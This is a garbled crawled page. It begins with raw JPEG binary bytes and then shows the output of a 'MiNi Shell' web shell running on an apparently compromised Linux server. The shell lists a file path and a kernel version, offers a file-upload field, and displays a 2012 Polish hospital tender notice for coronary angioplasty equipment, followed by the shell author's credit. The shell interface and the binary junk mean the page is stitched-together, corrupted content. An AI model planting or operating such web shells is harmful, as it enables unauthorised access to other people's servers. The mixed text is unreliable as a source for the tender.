JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120802/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120802/281862-N-2012.html

<p class="kh_header"><b>Warszawa: Dostawa sprzętu do angioplastyki wieńcowej, koronarografii</b><br>
<b>Numer ogłoszenia: 281862 - 2012; data zamieszczenia: 02.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Międzyleski Szpital Specjalistyczny w Warszawie , ul. Bursztynowa 2, 04-749 Warszawa, woj. mazowieckie, tel. 022 4735145, faks 022 6131992.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mssw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu do angioplastyki wieńcowej, koronarografii.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Określenie przedmiotu zamówienia:
1. Przedmiotem zamówienia jest dostawa do magazynu Zamawiającego, sprzętu do angioplastyki wieńcowej, koronorografii na potrzeby Międzyleskiego Szpitala Specjalistycznego                      w Warszawie. 
2. Przedmiot zamówienia został podzielony na 4 grupy zadaniowe oraz w ilościach i asortymencie wykazanych szczegółowo na formularzach cenowych stanowiących integralną część niniejszej specyfikacji.  

SPRZĘT DO ANGIOPLASTYKI WIEŃCOWEJ 

Stenty
		Zadanie I 
		Stenty wieńcowe stalowe
stent typu slotted tube, zamknięto-komórkowy, wykonany z jednego walca stali
średnice 2,5; 2,75; 3,0; 3,5; 4,0 mm, 
długości 7, 11, 15, 19, 23, 25, 27, 29, 32 mm ( zalecany  min 7 długości dla każdej średnicy)
Ciśnienie nominalne 7 bar
kompatybilny z cewnikiem prowadzącym 5F dla wszystkich rozmiarów
duża siła radialna -  sugerowana wartość ok. 68 PSI
stopień skracania stentu <2%
elastic recoil < 3%
procent pokrycia ściany naczynia przez metal ok. 12,5% dla średnicy 2,5 mm
profil końcówki (entry profile) 0,017
możliwość poszerzania stentu o 0,5 mm bez utraty jego parametrów
zachowuje dostęp do bocznic, cele umożliwiają dostęp do gałęzi o średnicy 3,0mm i mogą być doprężane bez utraty parametrów

	Zadanie II
Stenty wieńcowe powlekane lekiem 
- Stent typu slotted tube, fabrycznie montowany na balonie wysokociśnieniowym o kontrolowanej rozszerzalności, zaopatrzonym w markery.
- Stent ten w trakcie implantacji nie powinien zmieniać swego profilu, a podczas dostarczania stentu przez kręte naczynia i nie tworzyć  dysekcji na końcach stentu.
- długości stentów: 8 - 33mm, (co 5 mm).
- Średnice: 2.25 - 3,5 mm.
- Ciśnienie nominalne podczas rozprężania 11 atm (dla balonu 2.25 do 2.50 mm.), 10 atm. (dla balonu 2.75 do 3.50 mm.)
- Stenty zamontowane na balonie o ciśnieniu RBP 16 atm. (2.25 do 3.50 mm.) i MBP 22 atm.
-Kompatybilne z prowadnikiem 0,0014
- Skracalność stentu 1,7% (dla stentu 3.0 x 18).
- Współpracujące z cewnikiem prowadzącym 5F (0.056) dla stentów 2,25 - 3,50 mm.
- Recoil 1,6% przy nominalnym ciśnieniu.
-Część balonu poza stentem do 0,5mm
-Możliwość doprężenia: 2.25 , 3.00 mm do średnicy 3,75mm; 3.50 do 4.5 mm.
-Składanie balonu które zabezpieczy przed rotacją stentu (min 5 zakładek na balonie)
-Dedykowany dla pacjentów z cukrzycą
-Udowodnione działania na podstawie  badań na dużych grupach pacjentów i opublikowanych w biuletynach medycznych.
		
Balony
Zadanie III
		1) Cewniki balonowe do angioplastyki typu  compliant
- balon typu  compliant
- Dostępne średnice: 1.50, 2.0, 2.25, 2.5, 2.75, 3.0, 3.25, 3.5 mm.
- powłoka balonu hydrofilna
- system doprowadzającego typu monorail
- Dostępne długości: 10, 15, 20, 30 mm.
- miękka końcówka o średnicy 0,0017 pozwalająca na przechodzenie przez wąski i kręte naczynia
- niski profil złożonego balonu
- ciśnienie nominalne max 8 atm, 
- RBP 14 atm
- Profil wejścia końcówki (tip lead in profile): 0.014.
- Powiększenie o 1/4 wielkości przy 17 ATM (dla średnicy 2.5 mm.
- Pokrycie hydrofilne od części dystalnej (końcówki) do wyjścia prowadnika 
-  Możliwość przechodzenie przez kręte i ciasne naczynia, a także minimalizacja zaginania się cewnika - wskazana obecność zacisku w części.   
2) Cewniki balonowe do angioplastyki typu non -compliant
-Powłoka hydrofilna, odporna na zadrapania i uszkodzenia podczas doprężenia stentu
-Dostępne średnice: 2.25, 2.5, 2.75, 3.0, 3.25, 3.5, 3.75, 4.0 mm.
-Dostępne długości: 10, 15, 20, 25, 30 mm.
-Ciśnienie nominalne (NM): 14 ATM.
-Dostępne średnice: 2.25, 2.5, 2.75, 3.0, 3.25, 3.5, 3.75, 4.0 mm.
-RBP: 20 ATM - ze zmienną krzywą rozprężenia
-Powiększenie o 1/4 wielkości przy 24 ATM.
-Profil przejścia (crossing profile): 0.029 (dla średnicy 3.0 mm).
-Profil wejścia końcówki: 0.017.
-Profil shaftu proksymalnego/dystalnego: 1.9F/2.7F.
-Pokrycie hydrofilne od części dystalnej (końcówki) do wyjścia prowadnika.
-Shaft proksymalny: stalowa konstrukcja hypotube.
-Shaft dystalny: konstrukcja z materiału twarda.
-Specjalna konstrukcja końcówki, konstrukcja różnych kątów nachylenia balonu proksymalnie i dystalnie) zapewniająca bezpieczne, optymalne rozprężanie stentu bez efektu dog boning oraz podłużnego przyrostu, a także łatwe przejścia przez oczka . Stent dedykowany to technik kissing - kompatybilność z cewnikiem prowadzącym 6F (0.070).
- Bez efektu traumatyzującego naczynie poza miejscem stentowania.
Proksymalna część cewnika ustawiona pod kątem ostrym odpowiadającą za ułatwianie przechodzenia balonu, natomiast część dystalna pochylona pod kątem większym - precyzyjność i bezpieczeństwo zabiegu -. Jednolite ciśnienie na całej długości balonu.

    3) Cewnik balonowy semi- compliant
Cewnik balonowy typu rapid exchange
średnice od 1,20 - 7,0 mm (w zakresie 2,0 - 4,0 mm, co 0,25mm); 
długości od 10 do 40 mm;
długość szaftu 140 cm, w rozmiarach 2,5, 3,0, 3,5, 4,0 także dostępny szaft o długości 160 cm;
ciśnienie nominalne 7 bar dla śr 1,25 - 2,5 mm, 8 bar dla śr 2,75 - 7,0 mm;
ciśnienie RBP 14-18atm 
ciśnienie ABP 24 atm
kompatybilny z cewnikiem prowadzącym 5F do rozmiaru średnicy 4,0 mm, większe tylko z 6F;
powłoka hydrofilna na końcu cewnika, baloniku i części dystalnej szaftu, powłoka z PTFE na proksymalnej części szaftu,
profil końcówki 0,017;
balon o rozmiarze 1,25 mm z jednym markerem, który jest dedykowany do udrożnień;
profil balonu od 0,022 dla 1,25 mm, 0,024 dla 3,0 mm; do 0,028 dla 7,0;
posiadają dwa markery
cewnik w zakresie średnic 1,25 - 2,00 mm dostępny w wersji z jednym lub dwoma markerami

Zadanie IV
Prowadniki diagnostyczne J
- średnica od 0.025 do 0.038
- długość cm 150 - 190 - 280 
- sztywny rdzeń, dostępne różne sztywności prowadników, miękkie końcówki o długości: 3 cm, 7 cm, 10 cm., 15 cm., 20 cm. proste lub Ja o promieniu:  3 mm, 6mm, 15 mm., pokrycie substancją PTFE, techniką pre-coated, zmniejszające opory podczas wprowadzania i wycofywania prowadnika oraz ułatwiające manewrowanie, dobra manewrowalność dzięki sztywnej części proksymalnej. j. u. sterylne

3. Podaną ilość przedmiotu zamówienia należy traktować jako szacunkową, wstępną niezbędną do przeprowadzenia postępowania. Ostateczna wielkość przedmiotu zamówienia uzależniona będzie od rzeczywistych potrzeb Zamawiającego w okresie trwania umowy.
4. Płatność za dostarczany sprzęt wyszczególniony w zadaniach nr: I, II, III, będzie następowała po jego zużyciu.
5. Zamawiający będzie przedstawiał Wykonawcy co miesięczne zestawienie zużytego sprzętu, na podstawie którego Wykonawca wystawi fakturę.
6. Termin płatności za fakturę nie będzie krótszy niż 30 dni.
7. Oferta może dotyczyć wszystkich lub wybranych zadań. Nie dopuszcza się składania ofert częściowych w obrębie poszczególnych zadań.
8. Każdy Wykonawca ma prawo złożyć tylko jedną ofertę. Złożenie przez jednego Wykonawcę więcej niż jednej oferty lub oferty zawierającej alternatywy powoduje odrzucenie wszystkich ofert złożonych przez danego Wykonawcę.
9. Oferowany do przetargu asortyment (wymieniony w Formularzach Cenowych) musi być zgodny z opisem przedmiotu zamówienia, spełniać parametry opisane w poszczególnych zadaniach oraz pozycjach oraz musi spełniać warunki dopuszczenia do obrotu w placówkach służby zdrowia zgodnie z obowiązującymi przepisami prawa. 
10. Nie spełnienie któregokolwiek z parametrów daje podstawy Zamawiającemu do odrzucenia oferty. 
7.  Oferty będą oceniane wg kryteriów podanych w pkt. XVI SIWZ.
8. Termin realizacji zamówienia - 12 miesięcy od dnia podpisania umowy z Wykonawcą wyłonionym w trakcie postępowania przetargowego.
9. Projekty umów stanowiące Załączniki nr 1 i nr 2 do SIWZ są integralną częścią niniejszej dokumentacji i zapisy w nich zawarte traktuje się jako warunki udzielenia zamówienia.
10. Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, której wykonanie powierzy podwykonawcom..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.11.17.30-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełnienia warunku posiadania wiedzy i doświadczenia Wykonawca wykaże minimum 2 dostawy odpowiadające wielkością oraz wartością przedstawionego przedmiotu zamówienia. Jeżeli Wykonawca przystępuje do jednego lub więcej zadań - minimum 2 dostawy odpowiadające wielkością oraz wartością przedstawionego przez Zamawiającego w tych zadaniach asortymentu. Wykaz dostaw należy przedstawić dla każdego zadania osobno. Jeśli Wykonawca przystępuje do więcej niż jednego zadania możliwe jest przedstawienie wykazu dostaw łącznie dla oferowanych zadań, pod warunkiem, że dostawy zostały zrealizowane zgodnie z przedmiotem zamówienia oraz łączna wartość tych dostaw odpowiada łącznej wartości oferowanych zadań.
Spełnienie warunku posiadania wiedzy i doświadczenia Zamawiający będzie oceniał:
- minimum 2 dostawy odpowiadające wielkością  przedstawionego przez Zamawiającego w danych zadaniach asortymentu - spełnia 
- mniej niż 2 dostawy odpowiadające wielkością przedstawionego przez Zamawiającego w danych zadaniach asortymentu - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony  Formularz Ofertowy stanowiący Załącznik Nr 3 do niniejszej specyfikacji wraz  z wypełnionymi  załącznikami (Formularzami cenowymi).
2. Oświadczenie wykonawcy, że spełnia warunki określone przepisami art. 22 ust. 1 ustawy z dnia 29.01.2004 r. Prawo Zamówień Publicznych, zgodne ze  wzorem stanowiącym Załącznik   Nr 4 do SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Parametry techniczno-użytkowe - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.  Wszelkie zmiany i uzupełnienia do niniejszej umowy mogą być dokonane za zgodą obu stron  wyrażoną na piśmie pod rygorem nieważności.
2.  Strony dopuszczają możliwość zmian umowy w następujących przypadkach:
2.1	Zmiana stron umowy.
2.2  Zmiana banków lub numerów kont bankowych stron.
2.3  Zmiana cen spowodowana zmianą stawki podatku VAT, przy czym zmianie ulegnie 
       wyłącznie cena brutto, cena netto pozostanie bez zmian (obowiązuje od dnia wejścia w życie odpowiednich przepisów o zmianie stawki podatku VAT).
2.4 Zamiana sprzętu do angioplastyki wykazanego w umowie na sprzęt do angioplastyki o parametrach nie gorszych niż oferowany w przypadku  wycofania  z rynku oraz wstrzymania produkcji (w cenie nie wyższej niż oferowana).
     2.5. Zamiana sprzętu do angioplastyki wykazanego w umowie na sprzęt do angioplastyki o parametrach nie gorszych niż oferowane w przypadku braku aktualnego dopuszczenia do obrotu na terenie Rzeczpospolitej Polskiej.
2.6 Dopuszcza się przedłużenie umowy w przypadku niewykorzystania środków finansowych określonych w umowie(zmiana terminu obowiązywania umowy).
2.7 Dopuszcza się zmianę cen jednostkowych na niższe niż oferowane w ofercie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mssw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Międzyleski Szpital Specjalistyczny w Warszawie, ul. Bursztynowa 2, 04-749 Warszawa-Międzylesie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.08.2012 godzina 11:00, miejsce: Kancelaria Międzyleskiego Szpitala Specjalistycznego w Warszawie, ul. Bursztynowa 2, 04-749 Warszawa-Międzylesie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie I - STENTY WIEŃCOWE STALOWE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 pozycja asortymentowa wyspecjalizowana w SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.11.17.30-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Parametry techniczno-użytkowe - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZADANIE II - STENTY WIEŃCOWE POWLEKANE LEKIEM.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 pozcja asortymentowa wykazana w SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.11.17.30-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Parametry techniczno-użytkowe - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> ZADANIE III - CEWNIKI BALONOWE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3 pozycje asortymentowe wyspecjalizowane w SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.11.17.30-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Parametry techniczno-użytkowe - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> ZADANIE IV - PROWADNIKI DIAGNOSTYCZNE J.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 pozycja asortymentowa wyspecjalizowana w SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.11.17.30-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Parametry techniczno-użytkowe - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com